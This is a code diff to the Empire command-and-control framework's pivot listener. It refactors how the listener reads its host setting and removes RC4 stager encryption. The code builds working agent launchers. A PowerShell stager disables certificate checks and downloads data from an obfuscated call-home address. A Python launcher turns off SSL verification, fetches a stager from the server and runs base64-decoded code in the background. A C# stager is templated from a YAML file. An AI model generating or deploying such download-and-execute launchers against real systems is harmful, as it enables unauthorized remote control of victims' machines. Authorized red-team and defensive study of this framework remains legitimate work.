@@ -4,7 +4,7 @@ import logging
 import os
 import random
 
-from empire.server.common import encryption, helpers, packets, templating
+from empire.server.common import helpers, packets, templating
 from empire.server.common.empire import MainMenu
 from empire.server.core.db.base import SessionLocal
 from empire.server.utils import data_util, listener_util
@@ -64,6 +64,7 @@ class Listener:
         # required:
         self.mainMenu = mainMenu
         self.thread = None
+        self.host_address = None
 
         self.instance_log = log
 
@@ -104,21 +105,14 @@ class Listener:
             log.error("listeners/template generate_launcher(): no language specified!")
             return None
 
-        active_listener = self
-        # extract the set options for this instantiated listener
-        listenerOptions = active_listener.options
-
-        host = listenerOptions["Host"]["Value"]
-        launcher = listenerOptions["Launcher"]["Value"]
-        stagingKey = listenerOptions["StagingKey"]["Value"]
-        profile = listenerOptions["DefaultProfile"]["Value"]
+        launcher = self.options["Launcher"]["Value"]
+        stagingKey = self.options["StagingKey"]["Value"]
+        profile = self.options["DefaultProfile"]["Value"]
         uris = list(profile.split("|")[0].split(","))
         stage0 = random.choice(uris)
         customHeaders = profile.split("|")[2:]
 
-        if language.startswith("po"):
-            # PowerShell
-
+        if language == "powershell":
             stager = '$ErrorActionPreference = "SilentlyContinue";'
             if safe_checks.lower() == "true":
                 stager = "If($PSVersionTable.PSVersion.Major -ge 3){"
@@ -130,11 +124,11 @@ class Listener:
             stager += "$wc=New-Object System.Net.WebClient;"
 
             if user_agent.lower() == "default":
-                profile = listenerOptions["DefaultProfile"]["Value"]
+                profile = self.options["DefaultProfile"]["Value"]
                 user_agent = profile.split("|")[1]
             stager += f"$u='{user_agent}';"
 
-            if "https" in host:
+            if "https" in self.host_address:
                 # allow for self-signed certificates for https connections
                 stager += "[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};"
 
@@ -174,21 +168,10 @@ class Listener:
 
             # TODO: reimplement stager retries?
             # check if we're using IPv6
-            listenerOptions = copy.deepcopy(listenerOptions)
-            bindIP = listenerOptions["BindIP"]["Value"]
-            port = listenerOptions["Port"]["Value"]
-            if ":" in bindIP and "http" in host:
-                if "https" in host:
-                    host = "https://" + "[" + str(bindIP) + "]" + ":" + str(port)
-                else:
-                    host = "http://" + "[" + str(bindIP) + "]" + ":" + str(port)
 
             # code to turn the key string into a byte array
             stager += f"$K=[System.Text.Encoding]::ASCII.GetBytes('{stagingKey}');"
 
-            # this is the minimized RC4 stager code from rc4.ps1
-            stager += listener_util.powershell_rc4()
-
             # prebuild the request routing packet for the launcher
             routingPacket = packets.build_routing_packet(
                 stagingKey,
@@ -201,7 +184,7 @@ class Listener:
             b64RoutingPacket = base64.b64encode(routingPacket).decode("utf-8")
 
             # stager += "$ser="+helpers.obfuscate_call_home_address(host)+";$t='"+stage0+"';"
-            stager += f"$ser={helpers.obfuscate_call_home_address(host)};$t='{stage0}';$hop='{listener_name}';"
+            stager += f"$ser={helpers.obfuscate_call_home_address(self.host_address)};$t='{stage0}';$hop='{listener_name}';"
 
             # Add custom headers if any
             if customHeaders != []:
@@ -215,7 +198,7 @@ class Listener:
 
                     stager += f'$wc.Headers.Add("{headerKey}","{headerValue}");'
 
-            # add the RC4 packet to a cookie
+            # add the routing packet to a cookie
 
             stager += f'$wc.Headers.Add("Cookie","session={b64RoutingPacket}");'
             stager += "$data=$wc.DownloadData($ser+$t);"
@@ -246,7 +229,7 @@ class Listener:
             # Python
 
             launcherBase = "import sys;"
-            if "https" in host:
+            if "https" in self.host_address:
                 # monkey patch ssl woohooo
                 launcherBase += "import ssl;\nif hasattr(ssl, '_create_unverified_context'):ssl._create_default_https_context = ssl._create_unverified_context;\n"
 
@@ -258,12 +241,12 @@ class Listener:
                 log.error(p, exc_info=True)
 
             if user_agent.lower() == "default":
-                profile = listenerOptions["DefaultProfile"]["Value"]
+                profile = self.options["DefaultProfile"]["Value"]
                 user_agent = profile.split("|")[1]
 
             launcherBase += "import urllib.request;\n"
             launcherBase += f"UA='{user_agent}';"
-            launcherBase += f"server='{host}';t='{stage0}';"
+            launcherBase += f"server='{self.host_address}';t='{stage0}';"
 
             # prebuild the request routing packet for the launcher
             routingPacket = packets.build_routing_packet(
@@ -277,7 +260,7 @@ class Listener:
             b64RoutingPacket = base64.b64encode(routingPacket).decode("utf-8")
 
             launcherBase += "req=urllib.request.Request(server+t);\n"
-            # add the RC4 packet to a cookie
+            # add the routing packet to a cookie
             launcherBase += "req.add_header('User-Agent',UA);\n"
             launcherBase += (
                 f"req.add_header('Cookie',\"session={b64RoutingPacket}\");\n"
@@ -295,7 +278,7 @@ class Listener:
                 if proxy.lower() == "default":
                     launcherBase += "proxy = urllib.request.ProxyHandler();\n"
                 else:
-                    proto = proxy.Split(":")[0]
+                    proto = proxy.split(":")[0]
                     launcherBase += (
                         "proxy = urllib.request.ProxyHandler({'"
                         + proto
@@ -328,7 +311,7 @@ class Listener:
 
             # install proxy and creds globally, so they can be used with urlopen.
             launcherBase += "urllib.request.install_opener(o);\n"
-            launcherBase += "a=urllib.request.urlopen(req).read();\n"
+            launcherBase += "data=urllib.request.urlopen(req).read();\n"
 
             # download the stager and extract the IV
             launcherBase += listener_util.python_extract_stager(stagingKey)
@@ -348,19 +331,19 @@ class Listener:
                 return f"echo \"import sys,base64,warnings;warnings.filterwarnings('ignore');exec(base64.b64decode('{launchEncoded}'));\" | python3 &"
             return launcherBase
 
-        if language.startswith("csh"):
-            workingHours = listenerOptions["WorkingHours"]["Value"]
-            killDate = listenerOptions["KillDate"]["Value"]
+        if language == "csharp":
+            workingHours = self.options["WorkingHours"]["Value"]
+            killDate = self.options["KillDate"]["Value"]
             customHeaders = profile.split("|")[2:]
-            delay = listenerOptions["DefaultDelay"]["Value"]
-            jitter = listenerOptions["DefaultJitter"]["Value"]
-            lostLimit = listenerOptions["DefaultLostLimit"]["Value"]
+            delay = self.options["DefaultDelay"]["Value"]
+            jitter = self.options["DefaultJitter"]["Value"]
+            lostLimit = self.options["DefaultLostLimit"]["Value"]
 
             with open(self.mainMenu.installPath + "/stagers/Sharpire.yaml", "rb") as f:
                 stager_yaml = f.read()
             stager_yaml = stager_yaml.decode("UTF-8")
             stager_yaml = (
-                stager_yaml.replace("{{ REPLACE_ADDRESS }}", host)
+                stager_yaml.replace("{{ REPLACE_ADDRESS }}", self.host_address)
                 .replace("{{ REPLACE_SESSIONKEY }}", stagingKey)
                 .replace("{{ REPLACE_PROFILE }}", profile)
                 .replace("{{ REPLACE_WORKINGHOURS }}", workingHours)
@@ -430,10 +413,6 @@ class Listener:
             }
             stager = template.render(template_options)
 
-            # make sure the server ends with "/"
-            if not host.endswith("/"):
-                host += "/"
-
             # Patch in custom Headers
             remove = []
             if customHeaders != []:
@@ -459,9 +438,7 @@ class Listener:
             # base64 encode the stager and return it
             if encode:
                 return helpers.enc_powershell(stager)
-            if encrypt:
-                RC4IV = os.urandom(4)
-                return RC4IV + encryption.rc4(RC4IV + stagingKey, stager)
+
             return stager
 
         if language.lower() == "python":
@@ -492,12 +469,7 @@ class Listener:
             # base64 encode the stager and return it
             if encode:
                 return base64.b64encode(stager)
-            if encrypt:
-                # return an encrypted version of the stager ("normal" staging)
-                RC4IV = os.urandom(4)
-                return RC4IV + encryption.rc4(RC4IV + stagingKey, stager)
 
-            # otherwise return the standard stager
             return stager
 
         log.error(
@@ -614,8 +586,6 @@ class Listener:
 
         This should be implemented for the module.
         """
-        host = listenerOptions["Host"]["Value"]
-
         if not language:
             log.error("listeners/http generate_comms(): no language specified!")
             return None
@@ -631,7 +601,7 @@ class Listener:
 
             template_options = {
                 "session_cookie": self.session_cookie,
-                "host": host,
+                "host": self.host_address,
             }
 
             return template.render(template_options)
@@ -646,7 +616,7 @@ class Listener:
 
             template_options = {
                 "session_cookie": self.session_cookie,
-                "host": host,
+                "host": self.host_address,
             }
 
             return template.render(template_options)
@@ -787,25 +757,6 @@ class Listener:
                     )
                     script += f" -FirewallName {session_id}"
 
-                    for option in self.options:
-                        if option.lower() == "host":
-                            if self.options[option]["Value"].startswith("https://"):
-                                host = "https://{}:{}".format(
-                                    tempOptions["internalIP"]["Value"],
-                                    tempOptions["ListenPort"]["Value"],
-                                )
-                                self.options[option]["Value"] = host
-                            else:
-                                host = "http://{}:{}".format(
-                                    tempOptions["internalIP"]["Value"],
-                                    tempOptions["ListenPort"]["Value"],
-                                )
-                                self.options[option]["Value"] = host
-
-                    # check to see if there was a host value at all
-                    if "Host" not in list(self.options.keys()):
-                        self.options["Host"]["Value"] = host
-
                     self.mainMenu.agenttasksv2.create_task_shell(db, agent, script)
 
                     msg = "Tasked agent to install Pivot listener "
